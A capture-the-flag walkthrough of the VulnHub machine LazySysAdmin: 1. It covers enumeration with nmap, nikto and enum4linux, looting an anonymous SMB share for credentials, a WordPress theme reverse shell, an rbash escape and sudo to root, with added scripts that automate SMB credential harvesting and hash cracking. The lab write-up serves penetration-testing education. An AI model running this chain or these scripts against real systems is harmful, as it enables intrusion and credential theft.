LazySysAdmin: 1 – Walkthrough

Machine Information

  • Name: LazySysAdmin: 1
  • Date release: 20 Sep 2017
  • Author: Togie Mcdogie (Twitter: @TogieMcdogie)
  • Difficulty: Beginner – Intermediate
  • Description: Boot2root created out of frustration from failing my first OSCP exam attempt.
  • Download: https://www.vulnhub.com/entry/lazysysadmin-1,205/

Enumeration

I ran netdiscover to find the IP of the vulnerable box.

netdiscover -i eth0 

I got the result 192.168.226.132, then ran a full-port nmap scan. (-A already turns on -sC and OS detection, so -sC is redundant here; --script-args=unsafe=1 lets the NSE scripts run their intrusive checks.)

nmap -vv -Pn -sS -A -sC -p- -T3 --script-args=unsafe=1 -oA detailed_scan -n 192.168.226.132

# Nmap 7.25BETA2 scan initiated Wed Oct 4 09:53:30 2017 as: nmap -vv -Pn -sS -A -sC -p- -T3
 --script-args=unsafe=1 -oA detailed_scan -n 192.168.226.132
 Nmap scan report for 192.168.226.132
 Host is up, received arp-response (0.00090s latency).
 Scanned at 2017-10-04 09:53:32 EDT for 28s
 Not shown: 65529 closed ports
 Reason: 65529 resets
 PORT STATE SERVICE REASON VERSION
 22/tcp open ssh syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux;
 protocol 2.0)
 | ssh-hostkey:
 | 1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
 | ssh-dss AAAAB3NzaC1kc3MAAACBAKXQVTTRKsDhYwPWdmZ2BDTjKcCtJ7SnW0BHwbBvIdUVOh7zjZ6xjkEJ4TkT/Y
 +lJUolKMMNDu
 +CNPrRNKyBfjQ5w13mO7/3mKh9p52bzHG6XFS2m7GI4cLiDbmjO9L/YhU5deFP1Bo02KxzREp/ipz/CVlRr8IZm/x7SbPXt
 zv1AAAAFQDorLYH3AOwt18+kzAxGO0f2SarWQAAAIEAmOm6aWDLi
 +a85rfIm2Llb24aPZN3OsntJKVk4iCDbKxXi7xd6K9h1t+Utrg7dn4oO/QrVv8RRYBSiuJ8sy7B2+YDM0X7v
 +yqIG8FdA66tFpnMiMvdhYXoLyiod71vTqmGuAVKyHc56fUtdb3gCMjO0CHhPTKg2S0gPfFOqiyGVUAAACACvwr3X/J810m
 evpUQokt4xBBPNiIGkbK9KbZG63vi1NvGmaOkzbo3Cf8gZ0ILFd3YlryhP6c8PHaQMWcvzMT9oTyJ4FOokv1D3Mh4APPZ1S
 DqCmryHmRazggnbYlbGkYiqmZHUvS1zNalJHfC/QIHQZAjeUrHl8ZVHKk5ZYktAE=
 | 2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
 | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDL4kUdp6Gej0kmVuGrpPSUUIqYmMsiqjbZ4PFCmji
 +ozLhgBlWE4+XcghV9PWTUmBdU6yZsylputJMi87GBW8s66tCnZU2lm+APerAT+euYlUgi+xoigD
 +g2VWthVNwvj2mg8updYtcZ3Jv2besdsohtadike0fwJAPfvl/ss9jE9AFv73DHu2EuwrP/3tM0WG7GgQQj01TFmrLYnDX9
 unvKcOi3kLgQ9I6JfdSC1oc+lBtkOp12hr5gIlYIlAgI
 +E2yl79cdk6PTQ4mgRmIEJguLbWo8mnaEI77y1Lz7xpxi89/gWjQuS+DMPbbpoJZdRkTldTr0QaJuP2i0ys8Dh
 | 256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
 |_ecdsa-sha2-nistp256
 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBcmYC//tB7vdI00Q3Czjvzi7cao1q
 +PtbUHYxSk7ay3rM1LStjxRkpUZPQWpVRdU9kWJhIiYZDMPf8gOSgC2eY=
 80/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
 |_http-generator: Silex v2.2.7
 | http-methods:
 |_ Supported Methods: GET HEAD POST OPTIONS
 | http-robots.txt: 4 disallowed entries
 |_/old/ /test/ /TR2/ /Backnode_files/
 |_http-server-header: Apache/2.4.7 (Ubuntu)
 |_http-title: Backnode
 139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
 445/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
 3306/tcp open mysql syn-ack ttl 64 MySQL (unauthorized)
 6667/tcp open irc syn-ack ttl 64 InspIRCd
 | irc-info:
 | server: Admin.local
 | users: 1.0
 | servers: 1
 | chans: 0
 | lusers: 1
 | lservers: 0
 | source ident: nmap
 | source host: 192.168.226.131
 |_ error: Closing link: (nmap@192.168.226.131) [Client exited]
 MAC Address: 00:0C:29:46:BB:56 (VMware)
 Device type: general purpose
 Running: Linux 3.X|4.X
 OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
 OS details: Linux 3.2 - 4.4
 TCP/IP fingerprint:
 OS:SCAN(V=7.25BETA2%E=4%D=10/4%OT=22%CT=1%CU=35973%PV=Y%DS=1%DC=D%G=Y%M=000
 OS:C29%TM=59D4E7F8%P=i686-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=108%TI=Z%CI=I%I
 OS:I=I%TS=8)OPS(O1=M5B4ST11NW6%O2=M5B4ST11NW6%O3=M5B4NNT11NW6%O4=M5B4ST11NW
 OS:6%O5=M5B4ST11NW6%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120
 OS:%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M5B4NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%
 OS:S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%
 OS:RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W
 OS:=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
 OS:U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%D
 OS:FI=N%T=40%CD=S)

Uptime guess: 0.004 days (since Wed Oct 4 09:48:19 2017)
 Network Distance: 1 hop
 TCP Sequence Prediction: Difficulty=263 (Good luck!)
 IP ID Sequence Generation: All zeros
 Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
 |_clock-skew: mean: -3s, deviation: 0s, median: -3s
 | nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 | Names:
 | LAZYSYSADMIN<00> Flags: <unique><active>
 | LAZYSYSADMIN<03> Flags: <unique><active>
 | LAZYSYSADMIN<20> Flags: <unique><active>
 | WORKGROUP<00> Flags: <group><active>
 | WORKGROUP<1e> Flags: <group><active>
 | Statistics:
 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 |_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 | p2p-conficker:
 | Checking for Conficker.C or higher...
 | Check 1 (port 34402/tcp): CLEAN (Couldn't connect)
 | Check 2 (port 8449/tcp): CLEAN (Couldn't connect)
 | Check 3 (port 51322/udp): CLEAN (Failed to receive data)
 | Check 4 (port 50819/udp): CLEAN (Failed to receive data)
 |_ 0/4 checks are positive: Host is CLEAN or ports are blocked
 | smb-os-discovery:
 | OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
 | Computer name: lazysysadmin
 | NetBIOS computer name: LAZYSYSADMIN
 | Domain name:
 | FQDN: lazysysadmin
 |_ System time: 2017-10-04T23:53:48+10:00
 | smb-security-mode:
 | account_used: guest
 | authentication_level: user
 | challenge_response: supported
 |_ message_signing: disabled (dangerous, but default)
 |_smbv2-enabled: Server supports SMBv2 protocol

TRACEROUTE
 HOP RTT ADDRESS
 1 0.90 ms 192.168.226.132

Post-scan script results:
 | clock-skew:
 |_ -3s: Majority of systems scanned
 Read data files from: /usr/bin/../share/nmap
 OS and Service detection performed. Please report any incorrect results at
 https://nmap.org/submit/ .
 # Nmap done at Wed Oct 4 09:54:00 2017 -- 1 IP address (1 host up) scanned in 31.20 seconds

Port 80 (HTTP) and ports 139/445 (SMB) were open, so I ran Nikto against the web server and enum4linux against Samba.

nikto -h 192.168.226.132 -p 80

 - Nikto v2.1.6
 ---------------------------------------------------------------------------
 + Target IP: 192.168.226.132
 + Target Hostname: 192.168.226.132
 + Target Port: 80
 + Start Time: 2017-10-04 09:55:18 (GMT-4)
 ---------------------------------------------------------------------------
 + Server: Apache/2.4.7 (Ubuntu)
 + Server leaks inodes via ETags, header found with file /, fields: 0x8ce8 0x5560ea23d23c0
 + The anti-clickjacking X-Frame-Options header is not present.
 + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect
 against some forms of XSS
 + The X-Content-Type-Options header is not set. This could allow the user agent to render the
 content of the site in a different fashion to the MIME type
 + No CGI Directories found (use '-C all' to force check all possible dirs)
 + OSVDB-3268: /old/: Directory indexing found.
 + Entry '/old/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
 + OSVDB-3268: /test/: Directory indexing found.
 + Entry '/test/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
 + OSVDB-3268: /Backnode_files/: Directory indexing found.
 + Entry '/Backnode_files/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
 + "robots.txt" contains 4 entries which should be manually viewed.
 + Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final
 release) and 2.2.29 are also current.
 + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
 + OSVDB-3268: /apache/: Directory indexing found.
 + OSVDB-3092: /apache/: This might be interesting...
 + OSVDB-3092: /old/: This might be interesting...
 + Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.22
 + Uncommon header 'x-ob_mode' found, with contents: 0
 + OSVDB-3092: /test/: This might be interesting...
 + /info.php: Output from the phpinfo() function was found.
 + OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found.
 This gives a lot of system information.
 + OSVDB-3233: /icons/README: Apache default file found.
 + /info.php?file=http://cirt.net/rfiinc.txt?: Output from the phpinfo() function was found.
 + OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list
 (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
 + Uncommon header 'link' found, with contents: <http://192.168.226.132/wordpress/index.php?
 rest_route=/>; rel="https://api.w.org/"
 + /wordpress/: A WordPress installation was found.
 + /phpmyadmin/: phpMyAdmin directory found
 + 7690 requests: 0 error(s) and 27 item(s) reported on remote host
 + End Time: 2017-10-04 09:56:06 (GMT-4) (48 seconds)
 ---------------------------------------------------------------------------
 + 1 host(s) tested

enum4linux -a 192.168.226.132

 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Oct
 4 10:57:17 2017

==========================
 | Target Information |
 ==========================
 Target ........... 192.168.226.132
 RID Range ........ 500-550,1000-1050
 Username ......... ''
 Password ......... ''
 Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
 =======================================================
 | Enumerating Workgroup/Domain on 192.168.226.132 |
 =======================================================
 [+] Got domain/workgroup name: WORKGROUP

===============================================
 | Nbtstat Information for 192.168.226.132 |
 ===============================================
 Looking up status of 192.168.226.132
 LAZYSYSADMIN <00> - B <ACTIVE> Workstation Service
 LAZYSYSADMIN <03> - B <ACTIVE> Messenger Service
 LAZYSYSADMIN <20> - B <ACTIVE> File Server Service
 WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
 WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections

MAC Address = 00-00-00-00-00-00

========================================
 | Session Check on 192.168.226.132 |
 ========================================
 [+] Server 192.168.226.132 allows sessions using username '', password ''

==============================================
 | Getting domain SID for 192.168.226.132 |
 ==============================================
 Domain Name: WORKGROUP
 Domain Sid: (NULL SID)
 [+] Can't determine if host is part of domain or part of a workgroup

=========================================
 | OS information on 192.168.226.132 |
 =========================================
 [+] Got OS info for 192.168.226.132 from smbclient: Domain=[WORKGROUP] OS=[Windows 6.1]
 Server=[Samba 4.3.11-Ubuntu]
 [+] Got OS info for 192.168.226.132 from srvinfo:
 LAZYSYSADMIN Wk Sv PrQ Unx NT SNT Web server
 platform_id : 500
 os version : 6.1
 server type : 0x809a03

================================
 | Users on 192.168.226.132 |
 ================================
 Use of uninitialized value $users in print at ./enum4linux.pl line 874.
 Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.
 Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

============================================
 | Share Enumeration on 192.168.226.132 |
 ============================================
 WARNING: The "syslog" option is deprecated
 Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
 Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

Sharename Type Comment
 --------- ---- -------
 print$ Disk Printer Drivers
 share$ Disk Sumshare
 IPC$ IPC IPC Service (Web server)

Server Comment
 --------- -------
 LAZYSYSADMIN Web server

Workgroup Master
 --------- -------
 WORKGROUP LAZYSYSADMIN

[+] Attempting to map shares on 192.168.226.132
 //192.168.226.132/print$ Mapping: DENIED, Listing: N/A
 //192.168.226.132/share$ Mapping: OK, Listing: OK
 //192.168.226.132/IPC$ Mapping: OK Listing: DENIED

=======================================================
 | Password Policy Information for 192.168.226.132 |
 =======================================================

[+] Attaching to 192.168.226.132 using a NULL share

[+] Trying protocol 445/SMB...

[+] Found domain(s):

[+] LAZYSYSADMIN
 [+] Builtin

[+] Password Info for Domain: LAZYSYSADMIN

[+] Minimum password length: 5
 [+] Password history length: None
 [+] Maximum password age: Not Set
 [+] Password Complexity Flags: 000000

[+] Domain Refuse Password Change: 0
 [+] Domain Password Store Cleartext: 0
 [+] Domain Password Lockout Admins: 0
 [+] Domain Password No Clear Change: 0
 [+] Domain Password No Anon Change: 0
 [+] Domain Password Complex: 0

[+] Minimum password age: None
 [+] Reset Account Lockout Counter: 30 minutes
 [+] Locked Account Duration: 30 minutes
 [+] Account Lockout Threshold: None
 [+] Forced Log off Time: Not Set

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
 Minimum Password Length: 5
 =================================
 | Groups on 192.168.226.132 |
 =================================

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

==========================================================================
 | Users on 192.168.226.132 via RID cycling (RIDS: 500-550,1000-1050) |
 ==========================================================================
 [I] Found new SID: S-1-22-1
 [I] Found new SID: S-1-5-21-2952042175-1524911573-1237092750
 [I] Found new SID: S-1-5-32
 [+] Enumerating users using SID S-1-5-21-2952042175-1524911573-1237092750 and logon username
 '', password ''
 S-1-5-21-2952042175-1524911573-1237092750-500 *unknown*\*unknown* (8)
 S-1-5-21-2952042175-1524911573-1237092750-501 LAZYSYSADMIN\nobody (Local User)
-snip-
 S-1-5-21-2952042175-1524911573-1237092750-513 LAZYSYSADMIN\None (Domain Group)
-snip-
 [+] Enumerating users using SID S-1-5-32 and logon username '', password ''
-snip-
 S-1-5-32-544 BUILTIN\Administrators (Local Group)
 S-1-5-32-545 BUILTIN\Users (Local Group)
 S-1-5-32-546 BUILTIN\Guests (Local Group)
 S-1-5-32-547 BUILTIN\Power Users (Local Group)
 S-1-5-32-548 BUILTIN\Account Operators (Local Group)
 S-1-5-32-549 BUILTIN\Server Operators (Local Group)
 S-1-5-32-550 BUILTIN\Print Operators (Local Group)
-snip-
 [+] Enumerating users using SID S-1-22-1 and logon username '', password ''
 S-1-22-1-1000 Unix User\togie (Local User)

================================================
 | Getting printer info for 192.168.226.132 |
 ================================================
 No printers returned.
 enum4linux complete on Wed Oct 4 10:58:40 2017

From the Nikto results I found a WordPress installation at /wordpress/ and phpMyAdmin at /phpmyadmin/. Nikto also flagged /info.php, a phpinfo() page, which is worth a look on its own for paths, versions and loaded modules.

From enum4linux I found that the server accepts null sessions (username '' and password '') and that the share$ share can be mapped and listed anonymously:

 //192.168.226.132/share$ Mapping: OK, Listing: OK

Exploitation

Using the information I gathered I was able to exploit the vulnerable machine.

I used smbclient to connect over a null session and look at the contents of the share (-N suppresses the password prompt; the share name is quoted so the shell does not treat the trailing $ specially).

smbclient -N '//192.168.226.132/share$'

Under /wordpress I found wp-config.php, the WordPress configuration file. It holds the database name, the database user and that user's password in clear text, so an anonymously readable copy of it is effectively a credential leak.
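The share-to-credentials step above, as an added shell example (it is not code from the original write-up). It assumes the share is readable with an empty username and password, as enum4linux reported, and that the loot is written under ./loot; the dump_share, wp_define, wp_db_creds and find_password_notes names are mine, and the wp-config.php and deets.txt in the demo at the bottom are constructed samples, not files from the box.

```shell
#!/bin/sh
# Added example (not code from the original write-up): pull a null-session
# SMB share and mine the loot for credentials. Assumptions: the share is
# readable with an empty username and password, as enum4linux reported, and
# loot is written under ./loot. The wp-config.php and deets.txt used in the
# demo at the bottom are constructed samples, not files from the box.

# Recursively download every file in SHARE on HOST into OUTDIR.
#   -N           null session: no password prompt
#   recurse ON   descend into subdirectories
#   prompt OFF   no per-file confirmation for mget
dump_share() {
    host=$1; share=$2; outdir=$3
    mkdir -p "$outdir"
    ( cd "$outdir" && smbclient -N "//$host/$share" -c 'recurse ON; prompt OFF; mget *' )
}

# Print the value of define('NAME', 'value'); from a wp-config.php.
# Handles single or double quotes and stray whitespace inside the call.
wp_define() {
    file=$1; name=$2
    sed -n "s/^[[:space:]]*define([[:space:]]*['\"]$name['\"][[:space:]]*,[[:space:]]*['\"]\(.*\)['\"][[:space:]]*);.*/\1/p" "$file" | head -n 1
}

# One-line user:password@host summary, i.e. exactly what phpMyAdmin
# (or mysql -h HOST -u USER -p) will accept.
wp_db_creds() {
    printf '%s:%s@%s\n' "$(wp_define "$1" DB_USER)" "$(wp_define "$1" DB_PASSWORD)" "$(wp_define "$1" DB_HOST)"
}

# Sysadmin notes: every .txt file under DIR that mentions a password,
# printed as file:line:text.
find_password_notes() {
    find "$1" -type f -name '*.txt' -exec grep -HniE 'pass(word|wd)?' {} +
}

# Real run, only when TARGET is set (e.g. TARGET=192.168.226.132 sh smb_loot.sh;
# the script name is just an example).
if [ -n "${TARGET:-}" ]; then
    dump_share "$TARGET" 'share$' loot
    wp_db_creds loot/wordpress/wp-config.php
    find_password_notes loot
fi

# Offline demo on constructed files.
demo_dir=$(mktemp -d)
mkdir -p "$demo_dir/wordpress"
cat > "$demo_dir/wordpress/wp-config.php" <<'EOF'
<?php
/* constructed sample, not the real file from the box */
define('DB_NAME', 'wordpress');
define('DB_USER', 'wpuser');
define("DB_PASSWORD", "S3cret/P@ss^^");
define('DB_HOST', 'localhost');
EOF
cat > "$demo_dir/deets.txt" <<'EOF'
CBF Remembering all these passwords.
Password hunter2
EOF
wp_db_creds "$demo_dir/wordpress/wp-config.php"   # wpuser:S3cret/P@ss^^@localhost
find_password_notes "$demo_dir"
```

The mget loop is the part worth keeping: it grabs the whole tree in one go instead of one file at a time through the interactive prompt, and the grep over the loot catches the sort of note a sysadmin leaves behind (deets.txt here) without having to open every file.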

I browsed to phpMyAdmin and logged in with the database credentials from wp-config.php.

Clicking the wp_users table gave an error, so I ran the query by hand from the SQL tab instead:

SELECT `user_login`, `user_pass`, `user_nicename`, `user_email`
 FROM wp_users;

That returned the username and the hashed password. I fed the hash to John to crack it.

While John was running I tried the credentials I already had, with Admin as the username and TogieMYSQL12345^^ as the password.

Admin:TogieMYSQL12345^^ logged me straight into WordPress: the database password had been reused for the WordPress administrator account, so cracking was never needed.
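Preparing the wp_users output for John, as an added shell example (not code from the original write-up). It assumes the query result was exported from phpMyAdmin as tab-separated user_login/user_pass rows with a header line; the function names are mine, and the rows and hash values in the demo are constructed, not the box's real hashes.

```shell
#!/bin/sh
# Added example (not code from the original write-up): prepare the wp_users
# output for John and pick the right hash format before cracking. Assumption:
# the query result was exported from phpMyAdmin as tab-separated
# "user_login<TAB>user_pass" rows with a header line. The rows and hash values
# in the demo are constructed and are not the box's real hashes.

# Classify a WordPress user_pass value by its prefix.
#   $P$ / $H$   phpass portable hash (WordPress default since 2.5): john --format=phpass, hashcat -m 400
#   $2y$ etc.   bcrypt (plugins such as wp-password-bcrypt):         john --format=bcrypt, hashcat -m 3200
#   32 hex      legacy unsalted MD5 from pre-2.5 installs:           john --format=raw-md5, hashcat -m 0
wp_hash_format() {
    case $1 in
        '$P$'*|'$H$'*) echo phpass ;;
        '$2y$'*|'$2a$'*|'$2b$'*) echo bcrypt ;;
        *)
            if [ ${#1} -eq 32 ] && [ -z "$(printf '%s' "$1" | tr -d '0-9a-f')" ]; then
                echo md5
            else
                echo unknown
            fi ;;
    esac
}

# Convert "login<TAB>hash" rows into John's "login:hash" lines, dropping the
# header row and any row without a hash (a blank user_pass is a disabled account).
to_john_input() {
    awk -F'\t' '$2 != "" && $2 != "user_pass" { print $1 ":" $2 }' "$1"
}

# Print the john command for FILE, refusing mixed formats because john
# cracks one --format per run. WORDLIST defaults to rockyou.
john_command() {
    file=$1; wordlist=${2:-/usr/share/wordlists/rockyou.txt}
    fmt=$(cut -d: -f2- "$file" | while read -r h; do wp_hash_format "$h"; done | sort -u)
    case $fmt in
        phpass) echo "john --format=phpass --wordlist=$wordlist $file" ;;
        bcrypt) echo "john --format=bcrypt --wordlist=$wordlist $file" ;;
        md5)    echo "john --format=raw-md5 --wordlist=$wordlist $file" ;;
        *)      echo "mixed or unknown hash formats: $fmt" >&2; return 1 ;;
    esac
}

# Offline demo on a constructed export.
rows=$(mktemp)
printf 'user_login\tuser_pass\nAdmin\t$P$BfakefakefakefakefakefakefakeAb1\n' > "$rows"
john_input=$(mktemp)
to_john_input "$rows" > "$john_input"
cat "$john_input"            # Admin:$P$BfakefakefakefakefakefakefakeAb1
john_command "$john_input"   # john --format=phpass --wordlist=/usr/share/wordlists/rockyou.txt <tempfile>
```

The format check matters because John's autodetection is not reliable for phpass and a wrong --format silently cracks nothing; looking at the prefix first also tells you whether a short wordlist run is realistic (phpass is cheap, bcrypt is not).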

I navigated to Appearance > Editor and edited 404.php of the twentyfifteen theme.

I pasted in the contents of /usr/share/webshells/php/php-reverse-shell.php and edited its $ip and $port variables to point at my listener.

I set up a listener with nc.

nc -nlvp 443

I triggered the reverse shell by browsing to http://192.168.226.132/wordpress/wp-content/themes/twentyfifteen/404.php

I got a low-privilege shell as the web server user.

I checked /etc/passwd

cat /etc/passwd

 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
 bin:x:2:2:bin:/bin:/usr/sbin/nologin
 sys:x:3:3:sys:/dev:/usr/sbin/nologin
 sync:x:4:65534:sync:/bin:/bin/sync
 games:x:5:60:games:/usr/games:/usr/sbin/nologin
 man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
 lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
 mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
 news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
 uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
 proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
 www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
 backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
 list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
 irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
 nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
 libuuid:x:100:101::/var/lib/libuuid:
 syslog:x:101:104::/home/syslog:/bin/false
 messagebus:x:102:106::/var/run/dbus:/bin/false
 landscape:x:103:109::/var/lib/landscape:/bin/false
 togie:x:1000:1000:togie,,,:/home/togie:/bin/rbash
 sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
 mysql:x:105:113:MySQL Server,,,:/nonexistent:/bin/false

/etc/passwd shows a single regular user, togie, whose login shell is /bin/rbash, a restricted bash. I tried SSH as togie with the password from deets.txt, another file sitting in the SMB share:

 CBF Remembering all these passwords.

 Remember to remove this file and update your password after we push out the server.

 Password 12345

ssh togie@192.168.226.132

Using 12345 as the password I was able to log in.

Running a few commands such as dir and cd confirmed I was in a restricted shell, as the /bin/rbash entry in /etc/passwd had already suggested.

rbash restricts the shell itself (no cd, no changing PATH, no command names containing /), but it does not stop an interpreter that is already on the PATH from spawning an unrestricted one. This command got me out:

python -c 'import pty; pty.spawn("/bin/sh")'

I ran id and found that togie is a member of the sudo group.

I ran sudo su, entered 12345 as the password, and got root. The same password works for SSH and for sudo, so the note in deets.txt was effectively the root password.
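The restricted-shell and sudo-group checks from the last two steps, as an added shell example (not code from the original write-up) that covers both the rbash escape and the id check above. It assumes bash is installed (rbash is bash started as bash -r) and that the sudo-group check is given the output of id; the function names are mine and the id line in the demo is constructed.

```shell
#!/bin/sh
# Added example (not code from the original write-up): the checks behind the
# last steps, as reusable functions. Assumptions: bash is installed (rbash is
# bash started as "bash -r"), and the sudo-group check is given the output of
# id(1). The id line used in the demo is constructed.

# Is the shell started by the given command restricted? Asks bash itself:
# shopt restricted_shell is on inside rbash and "bash -r".
#   shell_is_restricted bash -r   -> exit 0
#   shell_is_restricted bash      -> exit 1
shell_is_restricted() {
    "$@" -c 'shopt -q restricted_shell' 2>/dev/null
}

# Interpreters and editors on PATH that can spawn an unrestricted /bin/sh from
# inside rbash. rbash refuses command names containing a slash and blocks
# changing PATH, so only bare names that resolve through the existing PATH
# count, which is exactly what command -v tests.
escape_candidates() {
    for bin in python3 python perl vi vim ed less more awk find; do
        command -v "$bin" >/dev/null 2>&1 && echo "$bin"
    done
    return 0
}

# Does an id(1) line place the user in a group that normally grants sudo?
# Debian/Ubuntu: sudo; RHEL/Fedora/BSD: wheel; older Ubuntu: admin.
in_sudo_group() {
    printf '%s\n' "$1" | grep -qE '[,=][0-9]+\((sudo|wheel|admin)\)'
}

# Demo on a constructed id line.
demo_id='uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo)'
if in_sudo_group "$demo_id"; then
    echo 'user is in a sudo-capable group: run sudo -l, then sudo su'
fi
echo 'escape candidates on this host:'
escape_candidates
```

On the box, python is what escape_candidates would have listed, and python -c 'import pty; pty.spawn("/bin/sh")' works precisely because python is invoked by bare name through the existing PATH. Once out, run sudo -l before sudo su: it shows what the group membership actually allows and whether a password is required at all.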

I navigated to /root and read proof.txt:

 WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
 Well done :)

 Hope you learn't a few things along the way.

 Regards,

 Togie Mcdogie
 Enjoy some random strings

 WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
 2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
 pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
 bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu